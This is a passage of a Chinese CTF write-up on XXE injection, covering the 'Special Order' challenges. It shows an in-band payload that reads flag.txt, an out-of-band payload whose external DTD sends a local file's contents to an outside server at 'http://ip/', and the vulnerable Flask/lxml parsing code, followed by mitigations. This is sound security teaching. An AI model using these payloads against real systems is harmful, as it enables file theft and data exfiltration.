<h6 id="在http-192-168-153-128-5000-customize-我们可以为上面我们创建的帖子添加样式："><a href="#在http-192-168-153-128-5000-customize-我们可以为上面我们创建的帖子添加样式：" class="headerlink" title="在http://192.168.153.128:5000/customize 我们可以为上面我们创建的帖子添加样式："></a>在<code>http://192.168.153.128:5000/customize</code> 我们可以为上面我们创建的帖子添加样式：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-6.png" alt></p>
<h6 id="添加样式后的结果如下："><a href="#添加样式后的结果如下：" class="headerlink" title="添加样式后的结果如下："></a>添加样式后的结果如下：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-7.png" alt></p>
<h6 id="从上面的结果来看我们可以自定义帖子的css样式参数："><a href="#从上面的结果来看我们可以自定义帖子的css样式参数：" class="headerlink" title="从上面的结果来看我们可以自定义帖子的css样式参数："></a>从上面的结果来看我们可以自定义帖子的css样式参数：</h6><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">* &#123;</span><br><span class="line">    <span class="attribute">font-size</span>: <span class="number">51px</span>;</span><br><span class="line">    <span class="attribute">color</span>: red;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h6 id="至于上面的51px-为什么不是50px-我也不知道QAQ。"><a href="#至于上面的51px-为什么不是50px-我也不知道QAQ。" class="headerlink" title="至于上面的51px;为什么不是50px;我也不知道QAQ。"></a>至于上面的<code>51px;</code>为什么不是<code>50px;</code>我也不知道QAQ。</h6><h6 id="这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。"><a href="#这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。" class="headerlink" title="这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。"></a>这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。</h6><h6 id="我们可以通过burpsuite抓包分析一下。"><a href="#我们可以通过burpsuite抓包分析一下。" class="headerlink" title="我们可以通过burpsuite抓包分析一下。"></a>我们可以通过burpsuite抓包分析一下。</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-8.png" alt></p>
<h6 id="发送的数据类型是Content-Type-application-json-。"><a href="#发送的数据类型是Content-Type-application-json-。" class="headerlink" title="发送的数据类型是Content-Type: application/json 。"></a>发送的数据类型是<code>Content-Type: application/json</code> 。</h6><h6 id="我们将其改成Content-Type-application-xml-，看看接不接受xml。"><a href="#我们将其改成Content-Type-application-xml-，看看接不接受xml。" class="headerlink" title="我们将其改成Content-Type: application/xml ，看看接不接受xml。"></a>我们将其改成<code>Content-Type: application/xml</code> ，看看接不接受xml。</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-9.png" alt></p>
<h6 id="通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证："><a href="#通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证：" class="headerlink" title="通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证："></a>通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-10.png" alt></p>
<h6 id="现在我们尝试进行xml注入："><a href="#现在我们尝试进行xml注入：" class="headerlink" title="现在我们尝试进行xml注入："></a>现在我们尝试进行xml注入：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-11.png" alt></p>
<h6 id="结果如下：-1"><a href="#结果如下：-1" class="headerlink" title="结果如下："></a>结果如下：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-12.png" alt></p>
<h6 id="接下来就是读取flag-txt文件-环境没有添加flag-txt-，最后的payload："><a href="#接下来就是读取flag-txt文件-环境没有添加flag-txt-，最后的payload：" class="headerlink" title="接下来就是读取flag.txt文件(环境没有添加flag.txt)，最后的payload："></a>接下来就是读取<code>flag.txt</code>文件(环境没有添加<code>flag.txt</code>)，最后的payload：</h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE root [</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY file SYSTEM "file:///app/flag.txt"&gt;</span></span><br><span class="line"><span class="meta">        ]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">color</span>&gt;</span>&amp;file;<span class="tag">&lt;/<span class="name">color</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">size</span>&gt;</span>40px<span class="tag">&lt;/<span class="name">size</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="0x09-Special-Order-pt2"><a href="#0x09-Special-Order-pt2" class="headerlink" title="0x09.Special Order pt2"></a>0x09.Special Order pt2</h4><h6 id="0x41414141-CTF的一道题目"><a href="#0x41414141-CTF的一道题目" class="headerlink" title="0x41414141 CTF的一道题目"></a><a href="https://ctftime.org/event/1249" target="_blank" rel="noopener">0x41414141 CTF的一道题目</a></h6><h6 id="该题是上一题的进化版-没有环境-，允许加载外部的dtd文件，因此payload如下："><a href="#该题是上一题的进化版-没有环境-，允许加载外部的dtd文件，因此payload如下：" class="headerlink" title="该题是上一题的进化版(没有环境)，允许加载外部的dtd文件，因此payload如下："></a>该题是上一题的进化版(没有环境)，允许加载外部的<code>dtd</code>文件，因此payload如下：</h6><h6 id="发送xml请求"><a href="#发送xml请求" class="headerlink" title="发送xml请求"></a>发送xml请求</h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE root [</span></span><br><span class="line"><span class="meta">&lt;!ENTITY % file SYSTEM "file:///flag.txt"&gt;</span></span><br><span class="line"><span class="meta">&lt;!ENTITY % xxe SYSTEM "http://ip/payload.dtd"&gt;</span></span><br><span class="line"><span class="meta">%xxe;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">color</span>&gt;</span>&amp;send;<span class="tag">&lt;/<span class="name">color</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">size</span>&gt;</span>40px<span class="tag">&lt;/<span class="name">size</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="在我们的服务器上"><a href="#在我们的服务器上" class="headerlink" title="在我们的服务器上"></a>在我们的服务器上</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % all &quot;&lt;!ENTITY send SYSTEM &apos;http://ip/?%file;&apos;&gt;&quot;&gt; %all;</span><br></pre></td></tr></table></figure>

<h6 id="0x08环境中代码有问题的部分"><a href="#0x08环境中代码有问题的部分" class="headerlink" title="0x08环境中代码有问题的部分"></a>0x08环境中代码有问题的部分</h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">elif</span> request.content_type == <span class="string">"application/xml"</span> <span class="keyword">or</span> request.content_type == <span class="string">"text/xml"</span>:</span><br><span class="line">            print(request.data)</span><br><span class="line">            parser = etree.XMLParser()</span><br><span class="line">            k = etree.fromstring(request.data, parser)</span><br><span class="line">            post_color = <span class="string">""</span></span><br><span class="line">            post_size = <span class="string">""</span></span><br><span class="line">            w = <span class="string">""</span></span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> k.getchildren():</span><br><span class="line">                <span class="keyword">if</span> i.tag == <span class="string">"color"</span>:</span><br><span class="line">                    post_color = i.text</span><br><span class="line">                <span class="keyword">elif</span> i.tag == <span class="string">"size"</span>:</span><br><span class="line">                    post_size = i.text</span><br><span class="line">            <span class="keyword">if</span> db.session.query(settings_map).filter_by(username=session[<span class="string">'username'</span>]).first():</span><br><span class="line">                db.session.query(settings_map).filter_by(username=session[<span class="string">'username'</span>]).update(&#123;<span class="string">"size"</span>: post_size, <span class="string">"color"</span>: post_color&#125;)</span><br><span class="line">                db.session.commit()</span><br><span class="line">                <span class="keyword">return</span> <span class="string">"DONE :D"</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                engine.execute(settings_table.insert(), username=session[<span class="string">'username'</span>], color=post_color, size=post_size)</span><br><span class="line">                <span class="keyword">return</span> <span class="string">"DONE :D"</span></span><br></pre></td></tr></table></figure>

<h6 id="没有过滤造成的。"><a href="#没有过滤造成的。" class="headerlink" title="没有过滤造成的。"></a>没有过滤造成的。</h6><h4 id="0x0A-防御方法："><a href="#0x0A-防御方法：" class="headerlink" title="0x0A.防御方法："></a>0x0A.防御方法：</h4><h5 id="禁用外部实体"><a href="#禁用外部实体" class="headerlink" title="禁用外部实体"></a>禁用外部实体</h5><h5 id="过滤和验证用户提交的XML数据"><a href="#过滤和验证用户提交的XML数据" class="headerlink" title="过滤和验证用户提交的XML数据"></a>过滤和验证用户提交的XML数据</h5><h5 id="不允许XML中含有任何自己声明的DTD"><a href="#不允许XML中含有任何自己声明的DTD" class="headerlink" title="不允许XML中含有任何自己声明的DTD"></a>不允许XML中含有任何自己声明的DTD</h5><h5 id="有效的措施：配置XML-parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可"><a href="#有效的措施：配置XML-parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可" class="headerlink" title="有效的措施：配置XML parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可"></a>有效的措施：配置<code>XML parser</code>只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可</h5><h4 id="0x0B参考链接"><a href="#0x0B参考链接" class="headerlink" title="0x0B参考链接"></a>0x0B参考链接</h4><h5 id="https-www-freebuf-com-vuls-175451-htmls"><a href="#https-www-freebuf-com-vuls-175451-htmls" class="headerlink" title="https://www.freebuf.com/vuls/175451.htmls"></a><a href="https://www.freebuf.com/vuls/175451.htmls" target="_blank" rel="noopener">https://www.freebuf.com/vuls/175451.htmls</a></h5><h5 id="https-www-cnblogs-com-backlion-p-9302528-html"><a href="#https-www-cnblogs-com-backlion-p-9302528-html" class="headerlink" title="https://www.cnblogs.com/backlion/p/9302528.html"></a><a href="https://www.cnblogs.com/backlion/p/9302528.html" target="_blank" rel="noopener">https://www.cnblogs.com/backlion/p/9302528.html</a></h5><h5 id="https-mp-weixin-qq-com-s-VWofHp5lJLYnbw01copnkw"><a href="#https-mp-weixin-qq-com-s-VWofHp5lJLYnbw01copnkw" class="headerlink" title="https://mp.weixin.qq.com/s/VWofHp5lJLYnbw01copnkw"></a><a href="https://mp.weixin.qq.com/s/VWofHp5lJLYnbw01copnkw" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/VWofHp5lJLYnbw01copnkw</a></h5><h5 id="https-blog-csdn-net-u011721501-article-details-43775691"><a href="#https-blog-csdn-net-u011721501-article-details-43775691" class="headerlink" title="https://blog.csdn.net/u011721501/article/details/43775691"></a><a href="https://blog.csdn.net/u011721501/article/details/43775691" target="_blank" rel="noopener">https://blog.csdn.net/u011721501/article/details/43775691</a></h5><h5 id="https-www-cnblogs-com-backlion-p-9302528-html-1"><a href="#https-www-cnblogs-com-backlion-p-9302528-html-1" class="headerlink" title="https://www.cnblogs.com/backlion/p/9302528.html"></a><a href="https://www.cnblogs.com/backlion/p/9302528.html" target="_blank" rel="noopener">https://www.cnblogs.com/backlion/p/9302528.html</a></h5>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/02/01/BambooFox-CTF-2021部分web题总结/" rel="next" title="BambooFox CTF 2021部分web题总结">
                <i class="fa fa-chevron-left"></i> BambooFox CTF 2021部分web题总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Ljdd520">
            
              <p class="site-author-name" itemprop="name">Ljdd520</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">52</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:yourname@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.wonderkun.cc/" title="wonderkun" target="_blank">wonderkun</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://example.com/" title="Title" target="_blank">Title</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-xxe漏洞"><span class="nav-number">1.1.</span> <span class="nav-text">0x01.xxe漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#XXE漏洞全称XML-External-Entity-Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。"><span class="nav-number">1.1.0.1.</span> <span class="nav-text">XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-xml定义"><span class="nav-number">1.2.</span> <span class="nav-text">0x02.xml定义</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#XML由3个部分构成，它们分别是：文档类型定义-Document-Type-Definition，DTD-，即XML的布局语言；可扩展的样式语言-Extensible-Style-Language，XSL-，即XML的样式表语言；以及可扩展链接语言-Extensible-Link-Language，XLL-。"><span class="nav-number">1.2.0.1.</span> <span class="nav-text">XML由3个部分构成，它们分别是：文档类型定义(Document Type Definition，DTD)，即XML的布局语言；可扩展的样式语言(Extensible Style Language，XSL)，即XML的样式表语言；以及可扩展链接语言(Extensible Link Language，XLL)。</span></a></li></ol></li></ol><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-xml的作用"><span class="nav-number">1.3.</span> <span class="nav-text">0x02.xml的作用</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#XML使用元素和属性来描述数-据。在数据传送过程中，XML始终保留了诸如父-子关系这样的数据结构。几个应用程序-可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">XML使用元素和属性来描述数 据。在数据传送过程中，XML始终保留了诸如父/子关系这样的数据结构。几个应用程序 可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#基本语法"><span class="nav-number">1.3.0.2.</span> <span class="nav-text">基本语法</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#示例如下："><span class="nav-number">1.3.0.3.</span> <span class="nav-text">示例如下：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x03-xml格式说明"><span class="nav-number">1.4.</span> <span class="nav-text">0x03.xml格式说明</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义-可选-、文档元素。"><span class="nav-number">1.4.0.1.</span> <span class="nav-text">XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x04-DTD"><span class="nav-number">1.5.</span> <span class="nav-text">0x04.DTD</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#文档类型定义-DTD-可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例"><span class="nav-number">1.5.0.1.</span> <span class="nav-text">文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#1-外部DTD"><span class="nav-number">1.5.1.</span> <span class="nav-text">1.外部DTD</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#test-dtd"><span class="nav-number">1.5.1.1.</span> <span class="nav-text">test.dtd</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x05-DTD数据类型"><span class="nav-number">1.6.</span> <span class="nav-text">0x05.DTD数据类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x06-DTD实体介绍"><span class="nav-number">1.7.</span> <span class="nav-text">0x06.DTD实体介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-内部实体"><span class="nav-number">1.7.1.</span> <span class="nav-text">1.内部实体</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#结果如下："><span class="nav-number">1.7.1.1.</span> <span class="nav-text">结果如下：</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-外部实体"><span class="nav-number">1.7.2.</span> <span class="nav-text">2.外部实体</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-参数实体-外部实体"><span class="nav-number">1.7.3.</span> <span class="nav-text">3.参数实体+外部实体</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#test-xml"><span class="nav-number">1.7.3.1.</span> <span class="nav-text">test.xml</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#dddd-dtd"><span class="nav-number">1.7.3.2.</span> <span class="nav-text">dddd.dtd</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#PS-name-参数实体-是在DTD中被引用的，而-amp-name-是在xml文档中被引用的。"><span class="nav-number">1.7.3.3.</span> <span class="nav-text">PS: %name(参数实体)是在DTD中被引用的，而&amp;name;是在xml文档中被引用的。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#XXE主要是利用了DTD引用外部实体导致的漏洞。"><span class="nav-number">1.7.3.4.</span> <span class="nav-text">XXE主要是利用了DTD引用外部实体导致的漏洞。</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x07-怎么判断网站是否存在XXE漏洞"><span class="nav-number">1.8.</span> <span class="nav-text">0x07.怎么判断网站是否存在XXE漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。"><span class="nav-number">1.8.0.1.</span> <span class="nav-text">最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x08-示例如下："><span class="nav-number">1.9.</span> <span class="nav-text">0x08.示例如下：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-实验环境"><span class="nav-number">1.9.1.</span> <span class="nav-text">1.实验环境</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#SpecialOrder"><span class="nav-number">1.9.1.1.</span> <span class="nav-text">SpecialOrder</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-分析"><span class="nav-number">1.9.2.</span> <span class="nav-text">2.分析</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#首页登录试验环境将会被重定向到一个登录界面："><span class="nav-number">1.9.2.1.</span> <span class="nav-text">首页登录试验环境将会被重定向到一个登录界面：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#环境有个注册选项，我们先注册一个用户，然后登录："><span class="nav-number">1.9.2.2.</span> <span class="nav-text">环境有个注册选项，我们先注册一个用户，然后登录：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#首页的右上角有几个路由，代表几个功能，我们可以一一尝试。"><span class="nav-number">1.9.2.3.</span> <span class="nav-text">首页的右上角有几个路由，代表几个功能，我们可以一一尝试。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#在http-192-168-153-128-5000-create-post-url下有一个类似于博客的提交框，可能存在存储性的xss"><span class="nav-number">1.9.2.4.</span> <span class="nav-text">在http://192.168.153.128:5000/create-post url下有一个类似于博客的提交框，可能存在存储性的xss</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#尝试了一下，不存在xss"><span class="nav-number">1.9.2.5.</span> <span class="nav-text">尝试了一下，不存在xss</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#在http-192-168-153-128-5000-customize-我们可以为上面我们创建的帖子添加样式："><span class="nav-number">1.9.2.6.</span> <span class="nav-text">在http://192.168.153.128:5000/customize 我们可以为上面我们创建的帖子添加样式：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#添加样式后的结果如下："><span class="nav-number">1.9.2.7.</span> <span class="nav-text">添加样式后的结果如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#从上面的结果来看我们可以自定义帖子的css样式参数："><span class="nav-number">1.9.2.8.</span> <span class="nav-text">从上面的结果来看我们可以自定义帖子的css样式参数：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#至于上面的51px-为什么不是50px-我也不知道QAQ。"><span class="nav-number">1.9.2.9.</span> <span class="nav-text">至于上面的51px;为什么不是50px;我也不知道QAQ。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。"><span class="nav-number">1.9.2.10.</span> <span class="nav-text">这个环境就只有两个功能，上面那个发帖子的功能和这个修改样式的功能，发帖子功能大概没什么bug，唯有这个修改样式的比较可疑。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#我们可以通过burpsuite抓包分析一下。"><span class="nav-number">1.9.2.11.</span> <span class="nav-text">我们可以通过burpsuite抓包分析一下。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#发送的数据类型是Content-Type-application-json-。"><span class="nav-number">1.9.2.12.</span> <span class="nav-text">发送的数据类型是Content-Type: application/json 。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#我们将其改成Content-Type-application-xml-，看看接不接受xml。"><span class="nav-number">1.9.2.13.</span> <span class="nav-text">我们将其改成Content-Type: application/xml ，看看接不接受xml。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证："><span class="nav-number">1.9.2.14.</span> <span class="nav-text">通过其返回没有报错，因此判断是支持xml的，刷新一下页面进一步验证：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#现在我们尝试进行xml注入："><span class="nav-number">1.9.2.15.</span> <span class="nav-text">现在我们尝试进行xml注入：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#结果如下：-1"><span class="nav-number">1.9.2.16.</span> <span class="nav-text">结果如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#接下来就是读取flag-txt文件-环境没有添加flag-txt-，最后的payload："><span class="nav-number">1.9.2.17.</span> <span class="nav-text">接下来就是读取flag.txt文件(环境没有添加flag.txt)，最后的payload：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x09-Special-Order-pt2"><span class="nav-number">1.10.</span> <span class="nav-text">0x09.Special Order pt2</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#0x41414141-CTF的一道题目"><span class="nav-number">1.10.0.1.</span> <span class="nav-text">0x41414141 CTF的一道题目</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#该题是上一题的进化版-没有环境-，允许加载外部的dtd文件，因此payload如下："><span class="nav-number">1.10.0.2.</span> <span class="nav-text">该题是上一题的进化版(没有环境)，允许加载外部的dtd文件，因此payload如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#发送xml请求"><span class="nav-number">1.10.0.3.</span> <span class="nav-text">发送xml请求</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#在我们的服务器上"><span class="nav-number">1.10.0.4.</span> <span class="nav-text">在我们的服务器上</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#0x08环境中代码有问题的部分"><span class="nav-number">1.10.0.5.</span> <span class="nav-text">0x08环境中代码有问题的部分</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#没有过滤造成的。"><span class="nav-number">1.10.0.6.</span> <span class="nav-text">没有过滤造成的。</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x0A-防御方法："><span class="nav-number">1.11.</span> <span class="nav-text">0x0A.防御方法：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#禁用外部实体"><span class="nav-number">1.11.1.</span> <span class="nav-text">禁用外部实体</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#过滤和验证用户提交的XML数据"><span class="nav-number">1.11.2.</span> <span class="nav-text">过滤和验证用户提交的XML数据</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#不允许XML中含有任何自己声明的DTD"><span class="nav-number">1.11.3.</span> <span class="nav-text">不允许XML中含有任何自己声明的DTD</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#有效的措施：配置XML-parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可"><span class="nav-number">1.11.4.</span> <span class="nav-text">有效的措施：配置XML 